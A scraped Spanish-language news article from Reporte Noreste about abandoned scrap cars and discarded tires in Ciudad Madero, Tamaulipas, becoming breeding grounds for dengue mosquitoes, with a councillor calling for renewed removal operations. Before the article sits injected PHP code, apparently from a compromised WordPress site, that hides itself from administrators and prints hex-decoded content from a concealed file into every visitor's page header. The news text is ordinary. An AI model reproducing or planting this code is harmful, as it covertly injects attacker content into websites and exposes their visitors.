if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Vehículos chatarra y llantas abandonadas en Madero, grave foco de infección – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Vehículos chatarra y llantas abandonadas en Madero, grave foco de infección

Vehículos chatarra y llantas abandonadas en Madero, grave foco de infección

Ciudad Madero Tamaulipas.- Ante la gran cantidad de llantas y vehículos chatarra abandonados en la vía pública, además de la basura electrónica, se han convertido en focos de infección, problemas de salud y hábitat de fauna nociva.

Azael Portillo Alejo, regidor presidente de la comisión de servicios públicos, señaló que a pesar que personal de limpieza asea las colonias del municipio, existe gente que arroja a la vía pública una gran cantidad de llantas, lo que provoca un foco de infección y la proliferación del mosquito transmisor del dengue, lo que representa un grave problema de salud.

REACTIVARAN LOS OPERATIVOS PARA RETIRAR AUTOS CHATARRA

Otro grave problema que se detectado en los recorridos por diversas colonias es el abandono de los autos chatarra, ante esta situación Azael Portillo, indicó que se solicitará a la dirección de Tránsito, reactive los operativos contra los autos abandonados, aplicando mano dura.

Azael Portillo exhorta a la población a no arrojar llantas y basura electrónica a la vía pública, canales y lagunas.

Lic. En Psicología Clínica por la UNE, Diplomado en Sexualidad Humana por la UNAM, LCC – UAT. Inició carrera en medios de comunicación en 1996.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas